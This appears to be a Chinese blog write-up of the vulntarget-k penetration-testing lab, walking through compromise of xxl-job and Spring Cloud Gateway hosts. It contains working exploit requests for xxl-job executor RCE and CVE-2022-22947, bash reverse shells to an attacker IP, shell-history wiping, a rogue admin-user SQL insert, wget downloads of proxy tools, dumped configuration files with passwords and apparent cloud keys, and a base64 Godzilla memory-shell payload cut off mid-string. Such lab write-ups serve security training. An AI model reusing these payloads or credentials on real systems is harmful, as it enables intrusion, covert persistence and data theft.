vulntarget-k(星期五实验室)

已于 2024-03-22 15:58:07 修改
阅读量1.1k 收藏 11
点赞数 27
文章标签: web安全
于 2024-03-21 09:08:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ka_ka11/article/details/136896134
版权

百度网盘

https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg
提取码: 2dwq

靶场环境

环境搭建

问题1:修改外网主机

外网-xxl-job

端口扫描,服务发现1
nmap -v -sS -Pn -p- 192.168.138.145
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-20 15:17 中国标准时间
Initiating ARP Ping Scan at 15:17
Scanning 192.168.138.145 [1 port]
Completed ARP Ping Scan at 15:17, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:17
Completed Parallel DNS resolution of 1 host. at 15:17, 5.58s elapsed
Initiating SYN Stealth Scan at 15:17
Scanning bogon (192.168.138.145) [65535 ports]
Discovered open port 8080/tcp on 192.168.138.145
Discovered open port 22/tcp on 192.168.138.145
Discovered open port 9999/tcp on 192.168.138.145
Discovered open port 8081/tcp on 192.168.138.145
Completed SYN Stealth Scan at 15:17, 1.21s elapsed (65535 total ports)
Nmap scan report for bogon (192.168.138.145)
Host is up (0.00020s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
9999/tcp open  abyss
MAC Address: 00:0C:29:50:FE:AC (VMware)

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 7.43 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65939 (2.638MB)
端口扫描,服务发现2

22端口

可以进行爆破

8080端口

8081端口

9999端口

xxl-job-execute未授权rce

POST /run HTTP/1.1
Host: 目标IP:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 391

{
  "jobId": 2,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "bash -i >& /dev/tcp/攻击者IP/攻击者监听端口 0>&1",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

上面exp无法反弹,使用大佬的exp

POST /run HTTP/1.1
Host: 192.168.138.145:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "bash -i >& /dev/tcp/192.168.138.133/1234 0>&1",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

得到目标的root权限

先将自己后续执行的命令隐藏起来

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

在web的目录下海存在一个服务 xxl-job-admin

获取交互式的shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
Ctrl-Z
stty raw -echo;fg
reset(回车)

xxl-job-admin后台rce

http://192.168.138.145:8080/xxl-job-admin/toLogin

直接进行爆破

将xxl-job-admin的jar下载后,进行反编译

python3 -m http.server 8000

下载xxl-job-admin,直接进行解压,找到数据库账号密码。

登录数据库,查看数据库密码

insert into xxl_job_user (id,username,password,role,permission) values (2,"admin1","e10adc3949ba59abbe56e057f20f883e",1,NULL);

登录成功

进入后台之后,在任务管理出可以做计划任务,填好必填项,运行模式为shell,保存

#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/192.168.138.133/8888 <&1'

执行一次,反弹shell

报错,执行器地址为空

重新反弹shell

反弹成功

内网信息收集

root目录下有个flag

直接上代理

上传frpc frpc.ini

wget http://192.168.138.133:8000/frpc
wget http://192.168.138.133:8000/frpc.ini

直接上fscan扫描

fscan64.exe  -socks5 192.168.138.133:10000 -h 192.168.100.20/24
E:\02-poc\fscan>fscan64.exe  -socks5 192.168.138.133:10000 -h 192.168.100.20/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
Socks5Proxy: socks5://192.168.138.133:10000
start infoscan
192.168.100.20:22 open
192.168.100.50:22 open
192.168.100.20:8080 open
192.168.100.20:8081 open
192.168.100.50:8800 open
192.168.100.50:8848 open
192.168.100.20:9999 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle: http://192.168.100.50:8848 code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.100.20:9999 code:200 len:61     title:None
[*] WebTitle: http://192.168.100.20:8080 code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.100.20:8081 code:404 len:306    title:None
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos
[*] WebTitle: http://192.168.100.50:8800 code:503 len:292    title:None
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] http://192.168.100.50:8800 Spring-Cloud-CVE-2022-22947
[+] http://192.168.100.50:8800 poc-yaml-springboot-env-unauth spring2
[+] http://192.168.100.50:8800 poc-yaml-spring-actuator-heapdump-file
已完成 7/7
[*] 扫描结束,耗时: 3m36.330141s

http://192.168.100.50:8848 ncao服务,有多个poc

http://192.168.100.50:8800 springboot服务

nacos 服务

存在Nacos token.secret.key默认配置(QVD-2023-6271)

]需要人工确认Nacos Jraft Hessian反序列化漏洞

注入内存马失败

登录后台,查看敏感信息

存在一些配置文件

gateway

spring:
  cloud:
    gateway:
      routes:
        - id: index
          uri: lb://product-server
          predicates:
            - Method=GET

admin-api


# 项目相关配置
admin-api:
  # access_key_id 你的亚马逊S3服务器访问密钥ID
  accessKey: AAAZKIAWTRDCOOZNINALPHDWN
  # secret_key 你的亚马逊S3服务器访问密钥
  secretKey: LAX2DAwi7yntlLnmOQvCYAAGITNloeZQlfLUSOzvW96s5c
  # bucketname 你的亚马逊S3服务器创建的桶名
  bucketName: kefu-test-env
  # bucketname 你的亚马逊S3服务器创建的桶名
  regionsName: ap-east-1
  # questionPicture 问题类型图片上传文件夹名称
  questionPicture: questionFolder
  # chatPicture 聊天图片上传文件夹名称
  chatPicture: chatFolder
  # rechargePicture 代客充值图片上传文件夹名称
  rechargePicture: rechargeFolder
   # 获取ip地址开关
  addressEnabled: true
  # 中后台的地址
  url: http://localhost
  # 中后台API地址
  seektopserUrl: http://localhost/api/partner/user/info/base
  # 中后台API请求APPID
  seektopAppId: A9AA30D1D30F459VS7B83C054B3EAD770D
  # 中后台API请求密钥
  seektopSecretKey: yT2BivSJLCR4lHb8SzhNFmHSF12pBm+a4IfdF42/a1quQdu5wqznM7YA==
  # 客服关闭会话配置时间
  closeChannelTime: 3
   # redis-task服务请求地址
  redisTaskUrl: http://localhost:8586 
  
im:
  server:
    url: https://localhost:9507
    secret: ^look^


server:
  port: 8500
  servlet:
    context-path: /api

#配置数据源
spring:
  datasource:
    druid:
      url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
      username: root
      password: Pabc@234%!

  main:
    allow-bean-definition-overriding: true

  jpa:
    hibernate:
      # 生产环境设置成 none,避免程序运行时自动更新数据库结构
      ddl-auto: none

  redis:
    #数据库索引
    database: 0
    host: 127.0.0.1
    port: 6379
    password: nbsg@123456
    #连接超时时间
    timeout: 50000

elasticsearch:
    nodes: es.localhost:9200

# 多数据源配置
gt:
  root:
    boot:
      #主动开启多数据源
      multiDatasourceOpen: true
      datasource[0]:
        dbName: slave
        url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
        username: root
        password: Pabc@234%!

#jwt
jwt:
  header: Authorization
  # 令牌前缀
  token-start-with: Bearer
  # 必须使用最少88位的Base64对该令牌进行编码
  base64-secret: ZmQ0ZGI5NjQ0MDQwY2I4MjMxY2Y3ZmI3MjdhN2ZmMjNhODViOTg1ZGE0NTBjMGM4NDA5NzYxMjdjOWMwYWRmZTBlZjlhNGY3ZTg4Y2U3YTE1ODVkZDU5Y2Y3OGYwZWE1NzUzNWQ2YjFjZDc0NGMxZWU2MmQ3MjY1NzJmNTE0MzI=
  # 令牌过期时间 此处单位/毫秒 ,默认4小时,可在此网站生成 https://www.convertworld.com/zh-hans/time/milliseconds.html
  token-validity-in-seconds: 14400000
  # 在线用户key
  online-key: online-token
  # 验证码
  code-key: code-key

#是否允许生成代码,生产环境设置为false
generator:
  enabled: false

#是否开启 swagger-ui
swagger:
  enabled: true

# 文件存储路径
file:
  mac:
    path: ~/file/
    avatar: ~/avatar/
  linux:
    path: /home/admin/file/
    avatar: /home/admin/avatar/
  windows:
    path: C:\admin\file\
    avatar: C:\admin\avatar\
  # 文件大小 /M
  maxSize: 100
  avatarMaxSize: 5

#七牛云
qiniu:
  # 文件大小 /M
  max-size: 15

#邮箱验证码有效时间/分钟
code:
  expiration: 5

#登录图形验证码有效时间/分钟
loginCode:
  expiration: 2

# sm.ms 图床的 token
smms:
  token: 1oOP3ykFDI0K6ifmtvU7c8Y1eTWZSlyl

task:
  pool:
    # 核心线程池大小
    core-pool-size: 10
    # 最大线程数
    max-pool-size: 30
    # 活跃时间
    keep-alive-seconds: 60
    # 队列容量
    queue-capacity: 50

#将该工程应用名称添加到计量器注册表的 tag 中
#开启 Actuator 服务
management:
  endpoints:
    web:
      exposure:
        include: '*'  
  metrics:
    tags:
      application: admin-api

xxl-JOB

server:
    port: 8080
    servlet:
        context-path: /xxl-job-admin

management:
    server:
        servlet:
            context-path: /actuator
    health:
        mail:
            enabled: false

spring:
    mvc:
        servlet:
            load-on-startup: 0
        static-path-pattern: /static/**
    resources:
        static-locations: classpath:/static/
    
    freemarker:
        templateLoaderPath: classpath:/templates/
        suffix: .ftl
        charset: UTF-8
        request-context-attribute: request
        settings:
            number_format: 0.##########

    datasource:
        url: jdbc:mysql://127.0.0.1:3306/xxl-job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=Asia/Shanghai
        username: root
        password: root_pwd
        driver-class-name: com.mysql.cj.jdbc.Driver
        type: com.zaxxer.hikari.HikariDataSource
        hikari:
            minimum-idle: 10
            maximum-pool-size: 30
            auto-commit: true
            idle-timeout: 30000
            pool-name: HikariCP
            max-lifetime: 900000
            connection-timeout: 10000
            connection-test-query: SELECT 1
    
    mail:
        host: smtp.qq.com
        port: 25
        username: xxx@qq.com
        from: xxx@qq.com
        password: xxx
        properties:
            mail:
                smtp:
                    auth: true
                    starttls:
                        enable: true
                        required: true
                    socketFactory:
                        class: javax.net.ssl.SSLSocketFactory
        

mybatis:
    mapper-locations: classpath:/mybatis-mapper/*Mapper.xml

xxl:
    job:
        accessToken: X336qlhSuYz2Nshk
        i18n: zh_CN
        triggerpool:
            fast:
                max: 200
            slow:
                max: 100

        logretentiondays: 5

domain-service


server:
  port: 8300
  servlet:
    context-path: /domain
    
mybatis:
    # 搜索指定包别名
    typeAliasesPackage: com.domain.**.domain
    # 配置mapper的扫描,找到所有的mapper.xml映射文件
    mapperLocations: classpath*:mapper/*Mapper.xml
    # 加载全局的配置文件
    configLocation: classpath:mybatis/mybatis-config.xml

#配置数据源
spring:
  datasource:
      url: jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
      username: root
      password: Pabc@234%!

  main:
    allow-bean-definition-overriding: true

    
  redis:
    #数据库索引
    database: 0
    host: 127.0.0.1
    port: 6379
    password: nbsg@123456
    #连接超时时间
    timeout: 50000
    
#jwt
jwt:
  header: Authorization
  # 令牌前缀
  token-start-with: Bearer
  # 必须使用最少88位的Base64对该令牌进行编码
  base64-secret: ZmQ0ZGI5NjQ0MDQwY2I4MjMxY2Y3ZmI3MjdhN2ZmMjNhODViOTg1ZGE0NTBjMGM4NDA5NzYxMjdjOWMwYWRmZTBlZjlhNGY3ZTg4Y2U3YTE1ODVkZDU5Y2Y3OGYwZWE1NzUzNWQ2YjFjZDc0NGMxZWU2MmQ3MjY1NzJmNTE0MzI=
  # 令牌过期时间 此处单位/毫秒 ,默认4小时,可在此网站生成 https://www.convertworld.com/zh-hans/time/milliseconds.html
  token-validity-in-seconds: 14400000
  # 在线用户key
  online-key: online-token
  # 验证码
  code-key: code-key

# 文件存储路径
file:
  mac:
    path: ~/file/
    avatar: ~/avatar/
  linux:
    path: /home/admin/file/
    avatar: /home/admin/avatar/
  windows:
    path: C:\admin\file\
    avatar: C:\admin\avatar\
  # 文件大小 /M
  maxSize: 100
  avatarMaxSize: 5

#登录图形验证码有效时间/分钟
loginCode:
  expiration: 2

# sm.ms 图床的 token
smms:
  token: 1oOP3ykFDI0K6ifmtvU7c8Y1eTWZSlyl

task:
  pool:
    # 核心线程池大小
    core-pool-size: 10
    # 最大线程数
    max-pool-size: 30
    # 活跃时间
    keep-alive-seconds: 60
    # 队列容量
    queue-capacity: 50

admin-api-bb


# 项目相关配置
admin-api:
  # access_key_id 你的亚马逊S3服务器访问密钥ID
  accessKey: AAKIAWTRDCOOZNINALPHDWN
  # secret_key 你的亚马逊S3服务器访问密钥
  secretKey: 2DAwi7yntlLnmOQvCYAAGITNloeZQlfLUSOzvW96s5c
  # bucketname 你的亚马逊S3服务器创建的桶名
  bucketName: kefu-test-env
  # bucketname 你的亚马逊S3服务器创建的桶名
  regionsName: ap-east-1
  # questionPicture 问题类型图片上传文件夹名称
  questionPicture: questionFolder
  # chatPicture 聊天图片上传文件夹名称
  chatPicture: chatFolder
   # 获取ip地址开关
  addressEnabled: true
  # 中后台的地址
  url: http://127.0.0.1
  # 中后台API地址
  seektopserUrl: http://127.0.0.1/api/partner/user/info/base
  # 中后台API请求APPID
  seektopAppId: A9AA30D1D30F4597B83C054B3EAD770D
  # 中后台API请求密钥
  seektopSecretKey: yT2BivSJLCR4lHb8hNFmHSF12pBm+a4IfdF42/a1quQdu5wqznM7YA==
  # 客服关闭会话配置时间
  closeChannelTime: 3
   # redis-task服务请求地址
  redisTaskUrl: http://localhost:8586 
   # SEO 代理帳號
  seoAgentName: 
  
im:
  server:
    url: http://localhost:9507/
    secret: ^look^


server:
  port: 8500
  servlet:
    context-path: /api

#配置数据源
spring:
  datasource:
    druid:
      url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
      username: root
      password: Pabc@234%!

  main:
    allow-bean-definition-overriding: true

  jpa:
    hibernate:
      # 生产环境设置成 none,避免程序运行时自动更新数据库结构
      ddl-auto: none

  redis:
    #数据库索引
    database: 0
    host: 127.0.0.1
    port: 6379
    password: nbsg@123456
    #连接超时时间
    timeout: 50000

elasticsearch:
    nodes: es.localhost:9200

# 多数据源配置
gt:
  root:
    boot:
      #主动开启多数据源
      multiDatasourceOpen: true
      datasource[0]:
        dbName: slave
        url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
        username: root
        password: Pabc@234%!

#jwt
jwt:
  header: Authorization
  # 令牌前缀
  token-start-with: Bearer
  # 必须使用最少88位的Base64对该令牌进行编码
  base64-secret: ZmQ0ZGI5NjQ0MDQwY2I4MjMxY2Y3ZmI3MjdhN2ZmMjNhODViOTg1ZGE0NTBjMGM4NDA5NzYxMjdjOWMwYWRmZTBlZjlhNGY3ZTg4Y2U3YTE1ODVkZDU5Y2Y3OGYwZWE1NzUzNWQ2YjFjZDc0NGMxZWU2MmQ3MjY1NzJmNTE0MzI=
  # 令牌过期时间 此处单位/毫秒 ,默认4小时,可在此网站生成 https://www.convertworld.com/zh-hans/time/milliseconds.html
  token-validity-in-seconds: 14400000
  # 在线用户key
  online-key: online-token
  # 验证码
  code-key: code-key

#是否允许生成代码,生产环境设置为false
generator:
  enabled: false

#是否开启 swagger-ui
swagger:
  enabled: true

# 文件存储路径
file:
  mac:
    path: ~/file/
    avatar: ~/avatar/
  linux:
    path: /home/admin/file/
    avatar: /home/admin/avatar/
  windows:
    path: C:\admin\file\
    avatar: C:\admin\avatar\
  # 文件大小 /M
  maxSize: 100
  avatarMaxSize: 5

#七牛云
qiniu:
  # 文件大小 /M
  max-size: 15

#邮箱验证码有效时间/分钟
code:
  expiration: 5

#登录图形验证码有效时间/分钟
loginCode:
  expiration: 2

# sm.ms 图床的 token
smms:
  token: 1oOP3ykFDI0K6ifmtvU7c8Y1eTWZSlyl

task:
  pool:
    # 核心线程池大小
    core-pool-size: 10
    # 最大线程数
    max-pool-size: 30
    # 活跃时间
    keep-alive-seconds: 60
    # 队列容量
    queue-capacity: 50

redis-task

server:
  port: 8586

api:
  task:
    url: http://127.0.0.1/api/office/taskHandle

knife4j:
  redis:
    host: 0.0.0.0
    password: nbsg@123456
    port: 6379
    databases: 0,1,2,3,4,5,6,7
    timeout: 60000


logging:
  config: classpath:logback.xml

xxl:
  job:
    admin:
      addresses: http://127.0.0.1:8998/xxl-job-admin
    accessToken: X336qlhSuYz2Nshk
    executor:
      appname: redis-task
      address:
      ip:
      port: 5599
      logpath: /data/logs/xxl-job/redis-task
      logretentiondays: 5


app:
  mq:
    delay:
      queue: bb_DELAY_QUEUE
      exchange: bb_delay_exchange

spring:
  rabbitmq:
    host: 127.0.0.1
    port: 5672
    username: admin
    password: global2018#
    virtualHost: /

部分云环境,本次靶场不涉及,这里不做考虑

redis

knife4j:
  redis:
    host: 0.0.0.0
    password: nbsg@123456
    port: 6379
    databases: 0,1,2,3,4,5,6,7
    timeout: 60000

mysql

spring:
  datasource:
      url: jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=false
      username: root
      password: Pabc@234%!

springboot服务

http://192.168.100.50:8800/

/actuator/configprops # 显示所有@ConfigurationProperties
/actuator/env # 公开 Spring 的ConfigurableEnvironment
/actuator/health # 显示应用程序运行状况信息
/actuator/httptrace # 显示 HTTP 跟踪信息
/actuator/metrics # 显示当前应用程序的监控指标信息。
/actuator/mappings # 显示所有@RequestMapping路径的整理列表
/actuator/threaddump # 线程转储
/actuator/heapdump # 堆转储
/actuator/jolokia # JMX-HTTP桥,它提供了一种访问JMX beans的替代方法

CVE-2022-22947

漏洞利用exp如下:

先创建一个路由,返回201表示创建成功


POST /actuator/gateway/routes/bolean HTTP/1.1
Host:192.168.100.50:8800
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "bolean",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

刷新路由

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.100.50:8800
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

访问路由


http://192.168.100.50:8800/actuator/gateway/routes/bolean

成功命令执行,接下来就是写shell了

写哥斯拉马的payload

POST /actuator/gateway/routes/bolean1 HTTP/1.1
Host: 192.168.100.50:8800
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 10956

{
      "id": "bolean1",
      "filters": [{
        "name": "AddResponseHeader",
        "args": {
            "name": "Result",
            "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('ms.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAOTG1zL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQANbGFtYmRhJGNtZCQxMQEARyhMb3JnL3NwcmluZ2ZyYW1ld29yay91dGlsL011bHRpVmFsdWVNYXA7KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAGYXJyT3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAWYBAAJpZAEABGRhdGEBAChMb3JnL3NwcmluZ2ZyYW1ld29yay91dGlsL011bHRpVmFsdWVNYXA7AQAGcmVzdWx0AQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwcAtwEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEADkdNZW1TaGVsbC5qYXZhDABpAGoBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwAZQBmDAEbARwMAGgAZgwBHQEeDABnAJIMAGcAZgwBHwEgAQAPamF2YS9sYW5nL0NsYXNzAQAQamF2YS9sYW5nL09iamVjdAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvDAEhASIMASMBJAEADG1zL0dNZW1TaGVsbAEAMG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZQEAEGphdmEvbGFuZy9TdHJpbmcMASUBKAcBKQwBKgErDAEsAS0BAAJvawEAE2phdmEvbGFuZy9FeGNlcHRpb24MAS4AagEABWVycm9yAQAXamF2YS9uZXQvVVJMQ2xhc3NMb2FkZXIBAAxqYXZhL25ldC9VUkwHAS8MATABMQwBMgEzDABpATQBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHATUMATYAmQwBNwE4AQADQUVTBwEaDAE5AToBAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDAE7ATwMAGkBPQwBPgE/DAFAAUEBAANNRDUHAUIMATkBQwwBRAFFDAFGAUcBABRqYXZhL21hdGgvQmlnSW50ZWdlcgwBSAE8DABpAUkMAR0BSgwBSwEeAQAQamF2YS51dGlsLkJhc2U2NAwBTAFNAQAKZ2V0RW5jb2RlcgwBTgEiAQAOZW5jb2RlVG9TdHJpbmcBABZzdW4ubWlzYy5CQVNFNjRFbmNvZGVyDAFPAVABAAZlbmNvZGUBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgwBUQFSAQAQQm9vdHN0cmFwTWV0aG9kcw8GAVMQAVQPBwFVEACpDAFWAVcHAVgMAVkBWgEAJ29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eQcBWwwBXAFdDABpAV4MAV8BHgcBYAwBYQFUDACcAJ0MAIkAigwAYQBiAQAHcGF5bG9hZAcBYgwBYwFUDACBAIIMAWQBZQEACnBhcmFtZXRlcnMBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQwBZgFnDAFoAWkMAWoBPAwAlQCWDAFoAUoMAWsBbAEAEWphdmEvdXRpbC9IYXNoTWFwAQAQM2M2ZTBiOGE5YzE1MjI0YQEAE2phdmF4L2NyeXB0by9DaXBoZXIBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAVwYXRocwEAB0J1aWxkZXIBAAxJbm5lckNsYXNzZXMBAGAoW0xqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8kQnVpbGRlcjsBAElvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyAQAFYnVpbGQBAEUoKUxvc